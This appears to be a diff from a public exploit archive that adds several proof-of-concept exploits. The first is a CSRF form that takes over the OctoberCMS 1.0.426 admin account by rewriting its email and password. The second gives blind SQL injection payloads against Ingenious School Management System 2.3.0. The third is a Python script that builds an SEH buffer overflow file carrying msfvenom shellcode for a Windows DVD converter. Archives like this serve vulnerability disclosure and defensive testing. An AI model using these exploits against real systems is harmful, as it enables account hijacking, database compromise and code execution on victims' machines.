Cross-Site Request Forgery exists in OctoberCMS 1.0.426 (aka Build 426) due to improper validation of CSRF Tokens for postback handling, allowing an attacker to successfully take over the victim's account.
|
||||
The vendor was using additional X-CSRF Headers and CSRF Token to prevent the CSRF from occurring.The researcher found a way to bypass this protection.After digging more in the Application he found a postback variable "_handler=" which could be used to perform CSRF without X-Headers.The CSRF Tokens were also not being validated when _handler parameter was used to make the request.
|
||||
In short, this attack bypasses a protection mechanism involving X-CSRF headers and CSRF tokens via a certain _handler postback variable.
|
||||
|
||||
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16244
|
||||
https://vuldb.com/?id.108857
|
||||
|
||||
2. Proof of Concept
|
||||
Below is the CSRF Exploit (.html) which can lead to the takeover of the Admin's Account upon successful execution.
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://host/backend/users/myaccount" method="POST">
|
||||
<input type="hidden" name="_handler" value="onSave" />
|
||||
<input type="hidden" name="User[login]" value="Admin" />
|
||||
<input type="hidden" name="User[email]" value="Hacked@hacked.com" />
|
||||
<input type="hidden" name="User[first_name]" value="Admin" />
|
||||
<input type="hidden" name="User[last_name]" value="1337" />
|
||||
<input type="hidden" name="User[password]" value="YourNewPassword" />
|
||||
<input type="hidden" name="User[password_confirmation]" value="YourNewPassword" />
|
||||
<input type="hidden" name="redirect" value="0" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Upon execution of this CSRF, the Admin Account details will be replaced by ours leading to complete hijacking of Admin Account.
|
||||
|
||||
3. Reference
|
||||
|
||||
https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0
|
||||
https://vuldb.com/?id.108857
|
||||
|
||||
4. Solution
|
||||
|
||||
The vulnerability will be patched by the vendor in the next release of OctoberCMS.Following changes should be made for a temporary fix (https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0).
|
||||
|
||||
|
||||
|
||||
37
platforms/php/webapps/43108.txt
Executable file
37
platforms/php/webapps/43108.txt
Executable file
|
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: Ingenious School Management System 2.3.0 - SQL injection
|
||||
# Date: 01.11.2017
|
||||
# Vendor Homepage: http://iloveprograming.com/
|
||||
# Software Link: https://www.codester.com/items/4945/ingenious-school-management-system
|
||||
# Demo: http://iloveprograming.com/view/login.php
|
||||
# Version: 2.3.0
|
||||
# Category: Webapps
|
||||
# Tested on: Kali Linux 2.0
|
||||
# Exploit Author: Giulio Comi
|
||||
# Contact: https://<http://ihsan.net/>linkedin.com/in/giuliocomi
|
||||
#Description
|
||||
|
||||
This vulnerability allows an attacker to inject SQL commands (without authentication) in 'friend_index' GET parameter.
|
||||
|
||||
# Proof of Concept:
|
||||
|
||||
http://localhost/view/friend_profile.php?friend_type=Student&friend_index=[SQL_injection_payload]
|
||||
|
||||
|
||||
# Vulnerable Parameter: friend_index (GET)
|
||||
|
||||
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: friend_type=Student&friend_index=1' AND 2576=2576 AND 'YJeg'='YJeg
|
||||
Vector: AND [INFERENCE]
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: friend_type=Student&friend_index=1' AND SLEEP(5) AND 'rliO'='rliO
|
||||
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -24,13 +24,6 @@
|
|||
#
|
||||
#Use or '=' as username and password
|
||||
#
|
||||
#
|
||||
#Live demo :
|
||||
#--------------------------------
|
||||
#
|
||||
#http://www.brummelliese.de/count/stats/
|
||||
#http://www.fire.uni-freiburg.de/counter/welcome/stats/
|
||||
#
|
||||
#=======================================================================================================================
|
||||
#Discovered by : -tmh- & Lainux
|
||||
#
|
||||
|
|
|
|||
53
platforms/windows/local/43104.py
Executable file
53
platforms/windows/local/43104.py
Executable file
|
|
@ -0,0 +1,53 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
###############################################################################
|
||||
# Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH)
|
||||
# Date: 05-10-2017
|
||||
# Exploit Author: Venkat Rajgor
|
||||
# Vendor Homepage: http://www.divxtodvd.net/
|
||||
# Software Link: http://www.divxtodvd.net/easy_video_to_dvd.exe
|
||||
# Tested On: Windows 7 x64
|
||||
#
|
||||
#
|
||||
# To reproduce the exploit:
|
||||
# 1. Click Register
|
||||
# 2. In the "Enter User Name" field, paste the content of evil.txt
|
||||
#
|
||||
##############################################################################
|
||||
filename="evil.txt"
|
||||
|
||||
buffer = "\x41" * 1008 #Buffer
|
||||
|
||||
nSEH = "\xEB\x06\x90\x90" #short Jump
|
||||
|
||||
SEH = "\x59\x78\x03\x10" #SEH
|
||||
|
||||
badchars = "\x00\x0A\x0D\x1A" # Bad Chars
|
||||
|
||||
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c # Payload To Pop Calc
|
||||
|
||||
shell=(
|
||||
"\xba\xf5\xed\x50\xfa\xdb\xde\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
|
||||
"\x31\x31\x56\x13\x83\xc6\x04\x03\x56\xfa\x0f\xa5\x06\xec\x52"
|
||||
"\x46\xf7\xec\x32\xce\x12\xdd\x72\xb4\x57\x4d\x43\xbe\x3a\x61"
|
||||
"\x28\x92\xae\xf2\x5c\x3b\xc0\xb3\xeb\x1d\xef\x44\x47\x5d\x6e"
|
||||
"\xc6\x9a\xb2\x50\xf7\x54\xc7\x91\x30\x88\x2a\xc3\xe9\xc6\x99"
|
||||
"\xf4\x9e\x93\x21\x7e\xec\x32\x22\x63\xa4\x35\x03\x32\xbf\x6f"
|
||||
"\x83\xb4\x6c\x04\x8a\xae\x71\x21\x44\x44\x41\xdd\x57\x8c\x98"
|
||||
"\x1e\xfb\xf1\x15\xed\x05\x35\x91\x0e\x70\x4f\xe2\xb3\x83\x94"
|
||||
"\x99\x6f\x01\x0f\x39\xfb\xb1\xeb\xb8\x28\x27\x7f\xb6\x85\x23"
|
||||
"\x27\xda\x18\xe7\x53\xe6\x91\x06\xb4\x6f\xe1\x2c\x10\x34\xb1"
|
||||
"\x4d\x01\x90\x14\x71\x51\x7b\xc8\xd7\x19\x91\x1d\x6a\x40\xff"
|
||||
"\xe0\xf8\xfe\x4d\xe2\x02\x01\xe1\x8b\x33\x8a\x6e\xcb\xcb\x59"
|
||||
"\xcb\x23\x86\xc0\x7d\xac\x4f\x91\x3c\xb1\x6f\x4f\x02\xcc\xf3"
|
||||
"\x7a\xfa\x2b\xeb\x0e\xff\x70\xab\xe3\x8d\xe9\x5e\x04\x22\x09"
|
||||
"\x4b\x67\xa5\x99\x17\x46\x40\x1a\xbd\x96")
|
||||
|
||||
evil = "\x90"*20 + shell
|
||||
|
||||
buffer = "A"*1008 + "\xEB\x06\x90\x90"+ "\x59\x78\x03\x10" + evil
|
||||
|
||||
|
||||
textfile = open(filename , 'w')
|
||||
textfile.write(buffer)
|
||||
textfile.close()
|
||||
Loading…
Add table
Reference in a new issue